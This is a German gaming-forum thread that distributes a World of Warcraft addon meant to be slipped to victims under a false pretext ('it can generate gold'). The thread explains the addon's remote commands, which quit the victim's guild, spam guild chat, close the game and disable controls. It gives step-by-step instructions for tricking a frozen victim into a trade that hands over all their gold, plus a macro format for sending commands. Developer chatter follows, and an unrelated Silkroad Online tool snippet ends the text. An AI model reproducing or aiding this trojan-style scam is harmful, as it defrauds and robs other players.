Bevor ihr Fragen bezüglich der Bedienung des Addon stellt, lest euch diesen Post aufmerksam durch, denn es wird im Grunde genommen alles erklärt. Mit Hilfe dieses Addons könnt ihr sobald ihr einer anderen Person das Addon untergejubelt habt(z.B. indem ihr sagt das Addon kann Gold erzeugen oder whatever) einige Befehle bei dem Char der Zielperson ausführen. Das Addon muss nur bei der Zielperson laufen und ihr schickt per Makros Befehle an die Zielperson.
Hinweis: Ich übernehme keine Verantwortung für Schäden(Goldscams, Banns,...) die mit diesem Addon angerichtet werden.
Verfügbare Befehle:
dismissPet: gibt das Pet frei(falls der Char eins hat)
dismount: abmounten
leaveParty: verlässt die aktuelle Gruppe
exit: schließt WoW
del: löscht die Makros(bei der Zielperson) die durch das Addon erstellt wurden
gquit: verlässt die Gilde
silverPerGold: setzt silverperGold auf 0.001
remove: W-A-S-D, UP-DOWN-LEFT-RIGHT funktioniert nicht mehr und Links-,Rechtsklick haben auch keine Wirkung mehr. Dieser Befehl sollte in Handelsreichweite durchgeführt werden. Wenn man nun die Zielperson anhandelt wird das gesamte Gold der Zielperson automatisch ins Handelsfenster geschrieben. Da AcceptTrade() nur durch ein Hardwareevent ausgelöst werden kann und nicht per Addon, wird folgende Methode verwendet um den Handel zu akzeptieren: Wenn das Handelsfenster erschienen ist, wird eingestellt, dass sich die Zielperson per Maus umsieht und der Mauszeiger verschwindet. Außerdem wird festgelegt, das ein Handel per Mausklick akzeptiert wird. Nun wird die Zielperson zu 99% versuchen zu klicken, da Maus und Bewegungstasten nicht mehr funktionieren. Leider gibtes noch einen kleinen Bug das das Gold erst beim zweiten mal anhandeln ins Handelsfenster geschrieben wird, aber ich werde ihn hoffentlich bald fixen.
Das im Spoiler, ist eine alte Methode mit Makros. Die neue ist mit nem GUI.
Am besten ihr erstellt euch für jeden Befehl ein Makro bevor ihr loslegt. Die obrigen Befehle(Makros) müssen in folgender Form an die Zielperson geschickt werden:
Code:
/script SendAddonMessage("Befehl","","WHISPER","Charname der Zielperson")
spamGuild: schreibt die angegebene Nachricht im Gildenchat
spamGuild muss folgende Form haben:
Code:
/script SendAddonMessage("spamGuild","Nachricht die gesendet werden soll","WHISPER","Charname der Zielperson")
z.B.
Code:
/script SendAddonMessage("spamGuild","i suck so hard","WHISPER","Honk")
Viel Spass damit
UPDATE 1: ControleStupidPeople von h3llf!re hab ich gefixt, sollte jetzt funktionieren. Mit Hilfe dieses Addons könnt ihr nun die Befehle per GUI senden. Die Makros werden jetzt nicht mehr benötigt.
-ControleStupidPeople benötigt ihr(/ic zum starten)
-gCreator müsst ihr der Zielperson geben
ControleStupidPeople kann eventuell noch Bugs haben und es lässt sich mit dem Befehl /ic starten und mit /ic auch wieder beenden. Macht euch am besten ein Makro mit /ic weil ihr könnt nicht aus dem GUI in den Chat swichten wenns mal läuft.
Neue Anleitung fürs Gold abzocken:
1. Name der Zielperson eingeben und Akzeptieren klicken
2. "SilverPerGold" Button klicken
3. "Freeze" Button klicken(möglichst nahe bei der Zielperson)
4. 2 mal anhandeln
5. warten
6. profit
7. "Makros" Button klicken
8. "Quit" Button klicken
Der Rest ist selbsterklärend denk ich.
Coded by unknown661, werds in Zukunft auch erweitern, je nachdem wie viel Zeit ich hab.
GUI wurde von h3llf!re erstellt, thx
Ja dann kommt aber mein ninja release :-p ne jetzt mal ernst. können gern gemeinsam was coden. werd dich am freitag im icq adden. bis dahin hab ich nämlich wenig zeit.
oh btw ich bin fertig.
habs jetzt nicht getestet sollte aber gehn :P
GUI (das was ihr seht. zu öffnen mit "/ic")
und die files von unknown hab ich auch überarbeitet (minimal). jetzt is die xml file raus. die war unnötig. hab ich eig nur gemacht damit er sichs angucken kann.
oh btw ich bin fertig.
habs jetzt nicht getestet sollte aber gehn :P
GUI (das was ihr seht. zu öffnen mit "/ic")
und die files von unknown hab ich auch überarbeitet (minimal). jetzt is die xml file raus. die war unnötig. hab ich eig nur gemacht damit er sichs angucken kann.
oh auch noch ein wortspiel. so ein zufall. höhöhö...
hab mir übrigens die funktionen nich angeguck und konnte also ga nich wissen dass die die args nich brauchen
Die args werden an die function übergeben
EDIT:
Ums anschaulicher zu machen
SetScript is ja nicht mehr als n functionsaufruf der in etwa so abläuft
Das beispiel da is natürlich absoluter blödsinn also kein kommentar drüber :P
PHP Code:
function frame:SetScript(ScriptType, func) if ScriptType == "OnTest" then if func and type(func) == "function" then local arg1, arg2, arg3 = "arg1", "arg2", "arg3" func(arg1, arg2, arg3) else -- remove end end end
[TOOL] Silkroad Online Tool!!! Auto Login + Patcher + Script !!! 09/28/2011 - SRO PServer Guides & Releases - 22 Replies Hello members!
If you remember i make SRO AutoLogin in minimalized window!
This is mine second script:
Process Pather by lolkop edit by me + mine autologin!
This is fastes and stable than Process Pather,
Silkroad Online tool is very easy only 1 click to patch!
http://img690.imageshack.us/img690/4966/silktool. png